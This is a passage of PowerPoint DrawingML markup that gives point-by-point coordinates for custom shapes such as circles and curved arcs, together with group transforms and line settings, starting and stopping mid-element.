                    <a:pt x="575088" y="323527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610527" y="296408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646780" y="270324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683826" y="245297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721641" y="221349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760203" y="198502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="799492" y="176778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="839484" y="156200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="880157" y="136789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="921490" y="118568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="963460" y="101558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1006045" y="85783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049223" y="71263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092972" y="58021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1137269" y="46080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1182094" y="35460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1227423" y="26185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1273235" y="18276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1319507" y="11755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1366218" y="6645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1413345" y="2968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1460866" y="745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1508759" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1556653" y="745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1604174" y="2968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1651301" y="6645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1698012" y="11755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744284" y="18276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1790096" y="26185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1835425" y="35460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1880250" y="46080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1924547" y="58021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968296" y="71263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2011474" y="85783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054059" y="101558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2096029" y="118568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2137362" y="136789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2178035" y="156200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2218027" y="176778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2257316" y="198502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2295878" y="221349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2333693" y="245297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2370739" y="270324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2406992" y="296408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2442431" y="323527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2477035" y="351660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2510780" y="380782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2543645" y="410874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2575607" y="441912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2606645" y="473874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2636737" y="506739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2665859" y="540484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2693992" y="575088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2721111" y="610527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2747195" y="646780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772222" y="683826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2796170" y="721641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2819017" y="760203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840741" y="799492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2861319" y="839484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2880730" y="880157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2898951" y="921490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2915961" y="963460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2931736" y="1006045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2946256" y="1049223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2959498" y="1092972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971439" y="1137269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2982059" y="1182094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2991334" y="1227423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2999243" y="1273235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3005764" y="1319507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3010874" y="1366218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3014551" y="1413345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016774" y="1460866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3017520" y="1508760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016774" y="1556653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3014551" y="1604174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3010874" y="1651301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3005764" y="1698012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2999243" y="1744284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2991334" y="1790096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2982059" y="1835425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971439" y="1880250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2959498" y="1924547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2946256" y="1968296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2931736" y="2011474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2915961" y="2054059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2898951" y="2096029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2880730" y="2137362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2861319" y="2178035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840741" y="2218027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2819017" y="2257316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2796170" y="2295878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772222" y="2333693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2747195" y="2370739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2721111" y="2406992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2693992" y="2442431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2665859" y="2477035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2636737" y="2510780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2606645" y="2543645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2575607" y="2575607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2543645" y="2606645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2510780" y="2636737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2477035" y="2665859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2442431" y="2693992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2406992" y="2721111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2370739" y="2747195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2333693" y="2772222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2295878" y="2796170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2257316" y="2819017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2218027" y="2840741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2178035" y="2861319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2137362" y="2880730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2096029" y="2898951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054059" y="2915961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2011474" y="2931736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968296" y="2946256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1924547" y="2959498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1880250" y="2971439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1835425" y="2982059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1790096" y="2991334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744284" y="2999243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1698012" y="3005764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1651301" y="3010874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1604174" y="3014551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1556653" y="3016774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1508759" y="3017520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1460866" y="3016774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1413345" y="3014551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1366218" y="3010874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1319507" y="3005764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1273235" y="2999243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1227423" y="2991334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1182094" y="2982059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1137269" y="2971439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092972" y="2959498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049223" y="2946256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1006045" y="2931736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="963460" y="2915961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="921490" y="2898951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="880157" y="2880730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="839484" y="2861319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="799492" y="2840741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760203" y="2819017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721641" y="2796170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683826" y="2772222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646780" y="2747195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610527" y="2721111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575088" y="2693992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540484" y="2665859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506739" y="2636737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473874" y="2606645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441912" y="2575607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410874" y="2543645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380782" y="2510780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351660" y="2477035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323527" y="2442431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296408" y="2406992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270324" y="2370739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245297" y="2333693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221349" y="2295878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198502" y="2257316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176778" y="2218027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156200" y="2178035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136789" y="2137362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118568" y="2096029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101558" y="2054059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85783" y="2011474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71263" y="1968296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58021" y="1924547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46080" y="1880250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35460" y="1835425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26185" y="1790096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18276" y="1744284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11755" y="1698012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6645" y="1651301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968" y="1604174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745" y="1556653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1508760"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="3946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320529" y="4261484"/>
              <a:ext cx="314325" cy="1838960"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="314325" h="1838960">
                  <a:moveTo>
                    <a:pt x="3428" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="32410" y="39134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59972" y="78954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86116" y="119424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110840" y="160511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134146" y="202180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156034" y="244397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176503" y="287127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195554" y="330336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213186" y="373989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229400" y="418052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244196" y="462491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257574" y="507272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269535" y="552359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280077" y="597718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289201" y="643315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296908" y="689116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303198" y="735087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308070" y="781192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311524" y="827397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313562" y="873669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314182" y="919972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313385" y="966272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311171" y="1012535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307540" y="1058726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302492" y="1104812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296028" y="1150757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288147" y="1196527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278849" y="1242088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268135" y="1287405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256005" y="1332444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242458" y="1377171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227496" y="1421551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211117" y="1465550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193322" y="1509133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174111" y="1552266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153485" y="1594914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131443" y="1637044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107985" y="1678620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83112" y="1719609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56823" y="1759976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29119" y="1799686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1838706"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="7620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250679" y="4797551"/>
              <a:ext cx="762000" cy="762000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="762000" h="762000">
                  <a:moveTo>
                    <a:pt x="381000" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="333204" y="2968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287181" y="11634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243288" y="25643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201881" y="44636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163318" y="68257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127955" y="96149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96149" y="127955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68257" y="163318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44636" y="201881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25643" y="243288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11634" y="287181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968" y="333204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968" y="428795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11634" y="474818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25643" y="518711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44636" y="560118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68257" y="598681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96149" y="634044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127955" y="665850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163318" y="693742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201881" y="717363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243288" y="736356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287181" y="750365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333204" y="759031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381000" y="762000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428795" y="759031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474818" y="750365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518711" y="736356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560118" y="717363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598681" y="693742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634044" y="665850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665850" y="634044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693742" y="598681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717363" y="560118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736356" y="518711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750365" y="474818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759031" y="428795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762000" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759031" y="333204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750365" y="287181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736356" y="243288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717363" y="201881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693742" y="163318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665850" y="127955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634044" y="96149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598681" y="68257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560118" y="44636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518711" y="25643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474818" y="11634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428795" y="2968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9539478" y="4984825"/>
            <a:ext cx="18542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237732" y="4223384"/>
            <a:ext cx="762000" cy="1915160"/>
            <a:chOff x="6237732" y="4223384"/>
            <a:chExt cx="762000" cy="1915160"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6617223" y="4261484"/>
              <a:ext cx="314325" cy="1838960"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="314325" h="1838960">
                  <a:moveTo>
                    <a:pt x="310753" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="281771" y="39134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254209" y="78954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228065" y="119424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203341" y="160511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180035" y="202180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158147" y="244397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137678" y="287127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118627" y="330336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100995" y="373989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84781" y="418052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69985" y="462491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56607" y="507272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44647" y="552359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34104" y="597718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24980" y="643315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17273" y="689116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10983" y="735087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6111" y="781192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2657" y="827397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620" y="873669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="919972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="796" y="966272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3010" y="1012535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6641" y="1058726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11689" y="1104812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18153" y="1150757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26034" y="1196527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35332" y="1242088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46046" y="1287405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58176" y="1332444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71723" y="1377171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86686" y="1421551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103064" y="1465550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120859" y="1509133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140070" y="1552266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160696" y="1594914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182739" y="1637044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206196" y="1678620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231070" y="1719609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257358" y="1759976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285062" y="1799686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314182" y="1838706"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="7620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237732" y="4797551"/>
              <a:ext cx="762000" cy="762000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="762000" h="762000">
                  <a:moveTo>
                    <a:pt x="380999" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="333204" y="2968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287181" y="11634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243288" y="25643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201881" y="44636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163318" y="68257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127955" y="96149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96149" y="127955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68257" y="163318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44636" y="201881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25643" y="243288"/>
                  </a:lnTo>
